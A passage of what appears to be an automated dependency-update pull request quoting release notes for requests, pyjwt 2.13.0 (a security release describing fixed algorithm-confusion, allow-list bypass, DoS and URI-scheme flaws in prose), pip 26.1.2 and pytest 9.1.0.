href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.33.1...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pip` from 26.1 to 26.1.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/pip/blob/main/NEWS.rst\"\u003epip's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e26.1.2 (2026-05-31)\u003c/h1\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject \u003ccode\u003econsole_scripts\u003c/code\u003e and \u003ccode\u003egui_scripts\u003c/code\u003e entry points whose name would\ninstall a script outside the scripts directory. (\u003ccode\u003e[#14000](https://github.com/pypa/pip/issues/14000) \u0026lt;https://github.com/pypa/pip/issues/14000\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003cli\u003eFix installation incorrectly failing when the target path contains a doubled\nslash, such as with \u003ccode\u003epip install --root //...\u003c/code\u003e. (\u003ccode\u003e[#14001](https://github.com/pypa/pip/issues/14001) \u0026lt;https://github.com/pypa/pip/issues/14001\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003cli\u003eSend a consistent \u003ccode\u003eAccept-Encoding\u003c/code\u003e header to avoid a spurious \u003ccode\u003eCache entry deserialization failed\u003c/code\u003e warning. (\u003ccode\u003e[#14012](https://github.com/pypa/pip/issues/14012) \u0026lt;https://github.com/pypa/pip/issues/14012\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e26.1.1 (2026-05-04)\u003c/h1\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where uninstallation left behind empty directories. Revert the\nremoval of the adjacent \u003ccode\u003e__pycache__\u003c/code\u003e directory when a .py file is removed. (\u003ccode\u003e[#13973](https://github.com/pypa/pip/issues/13973) \u0026lt;https://github.com/pypa/pip/issues/13973\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/31d7d168953668aad85154d6121879d07fbeac27\"\u003e\u003ccode\u003e31d7d16\u003c/code\u003e\u003c/a\u003e Bump for release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/79f348c86a149adec5a9852788dcc13114b29d3c\"\u003e\u003ccode\u003e79f348c\u003c/code\u003e\u003c/a\u003e Update AUTHORS.txt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/237a9258813636b7b1ead05e2cb0d509b44f67ee\"\u003e\u003ccode\u003e237a925\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip/issues/14001\"\u003e#14001\u003c/a\u003e from notatallshaw/fix-is-within-directory\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/34d0285d548bbd644bfabfede2dfabed23c240db\"\u003e\u003ccode\u003e34d0285\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip/issues/14006\"\u003e#14006\u003c/a\u003e from laymonage/fix-requirements_from_scripts-space-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/09d3e07066c56e20b4ab2b3133e29f02f19be5e9\"\u003e\u003ccode\u003e09d3e07\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip/issues/14012\"\u003e#14012\u003c/a\u003e from notatallshaw/stable-accept-encoding\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/fa7854f6b37113a2c4698cdde902e1fcc9bebdd5\"\u003e\u003ccode\u003efa7854f\u003c/code\u003e\u003c/a\u003e Use is_within_directory for entry point check\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/d01b46c273e08bf4299feb81899c9bd0b3e7029b\"\u003e\u003ccode\u003ed01b46c\u003c/code\u003e\u003c/a\u003e NEWS ENTRY\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/7ff8bdd81ec5edca2bebf78ad8506dda710d6af5\"\u003e\u003ccode\u003e7ff8bdd\u003c/code\u003e\u003c/a\u003e Fix is_within_directory for doubled-slash roots\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/7ea3466fb51ccc729e67ea85809df5a4dda1987b\"\u003e\u003ccode\u003e7ea3466\u003c/code\u003e\u003c/a\u003e NEWS ENTRY\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/85673eaa109f343658f9904f4045ff009378ae08\"\u003e\u003ccode\u003e85673ea\u003c/code\u003e\u003c/a\u003e Fix Accept-Encoding to gzip, deflate\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/pip/compare/26.1...26.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pytest` from 9.0.3 to 9.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/pytest/releases\"\u003epytest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e9.1.0\u003c/h2\u003e\n\u003ch1\u003epytest 9.1.0 (2026-06-13)\u003c/h1\u003e\n\u003ch2\u003eRemovals and backward incompatible breaking changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14533\"\u003e#14533\u003c/a\u003e: When using \u003ccode\u003e--doctest-modules\u003c/code\u003e, autouse fixtures with \u003ccode\u003emodule\u003c/code\u003e, \u003ccode\u003epackage\u003c/code\u003e or \u003ccode\u003esession\u003c/code\u003e scope that are defined inline in Python test modules (not plugins or conftests) will now possibly execute twice.\u003c/p\u003e\n\u003cp\u003eIf this is undesirable, move the fixture definition to a \u003ccode\u003econftest.py\u003c/code\u003e file if possible.\u003c/p\u003e\n\u003cp\u003eTechnical explanation for those interested:\nWhen using \u003c!-- raw HTML omitted --\u003e--doctest-modules\u003c!-- raw HTML omitted --\u003e, pytest possibly collects Python modules twice, once as \u003ccode\u003epytest.Module\u003c/code\u003e and once as a \u003ccode\u003eDoctestModule\u003c/code\u003e (depending on the configuration).\nDue to improvements in pytest's fixture implementation, if e.g. the \u003ccode\u003eDoctestModule\u003c/code\u003e collects a fixture, it is now visible to it only, and not to the \u003ccode\u003eModule\u003c/code\u003e.\nThis means that both need to register the fixtures independently.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDeprecations (removal in next major release)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/10819\"\u003e#10819\u003c/a\u003e: Added a deprecation warning for class-scoped fixtures defined as instance methods (without \u003ccode\u003e@classmethod\u003c/code\u003e). Such fixtures set attributes on a different instance than the test methods use, leading to unexpected behavior. Use \u003ccode\u003e@classmethod\u003c/code\u003e decorator instead -- by \u003ccode\u003eyastcher\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003e10819\u003c/code\u003e and \u003ccode\u003e14011\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/12882\"\u003e#12882\u003c/a\u003e: Calling \u003ccode\u003erequest.getfixturevalue() \u0026lt;pytest.FixtureRequest.getfixturevalue\u0026gt;\u003c/code\u003e during teardown to request a fixture that was not already requested is now deprecated and will become an error in pytest 10.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003edynamic-fixture-request-during-teardown\u003c/code\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/13409\"\u003e#13409\u003c/a\u003e: Using non-\u003ccode\u003e~collections.abc.Collection\u003c/code\u003e iterables (such as generators, iterators, or custom iterable objects) for the \u003ccode\u003eargvalues\u003c/code\u003e parameter in \u003ccode\u003e@pytest.mark.parametrize \u0026lt;pytest.mark.parametrize ref\u0026gt;\u003c/code\u003e and \u003ccode\u003emetafunc.parametrize \u0026lt;pytest.Metafunc.parametrize\u0026gt;\u003c/code\u003e is now deprecated.\u003c/p\u003e\n\u003cp\u003eThese iterables get exhausted after the first iteration,\nleading to tests getting unexpectedly skipped in cases such as running \u003ccode\u003epytest.main()\u003c/code\u003e multiple times,\nusing class-level parametrize decorators,\nor collecting tests multiple times.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003eparametrize-iterators\u003c/code\u003e for details and suggestions.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/13946\"\u003e#13946\u003c/a\u003e: The private \u003ccode\u003econfig.inicfg\u003c/code\u003e attribute is now deprecated.\nUse \u003ccode\u003econfig.getini() \u0026lt;pytest.Config.getini\u0026gt;\u003c/code\u003e to access configuration values instead.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003econfig-inicfg\u003c/code\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14004\"\u003e#14004\u003c/a\u003e: Passing \u003ccode\u003ebaseid\u003c/code\u003e to \u003ccode\u003e~pytest.FixtureDef\u003c/code\u003e or \u003ccode\u003enodeid\u003c/code\u003e strings to fixture registration APIs is now deprecated. These are internal pytest APIs that are used by some plugins.\u003c/p\u003e\n\u003cp\u003eUse the \u003ccode\u003enode\u003c/code\u003e parameter instead for fixture scoping. This enables more robust node-based\nmatching instead of string prefix matching.\nIf you've used \u003ccode\u003enodeid=None\u003c/code\u003e, pass \u003ccode\u003enode=session\u003c/code\u003e instead.\u003c/p\u003e\n\u003cp\u003eThis will be removed in pytest 10.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14335\"\u003e#14335\u003c/a\u003e: The method of configuring hooks using markers, deprecated since pytest 7.2, is now scheduled to be removed in pytest 10.\nSee \u003ccode\u003ehook-markers\u003c/code\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14434\"\u003e#14434\u003c/a\u003e: The \u003ccode\u003e--pastebin\u003c/code\u003e option is now 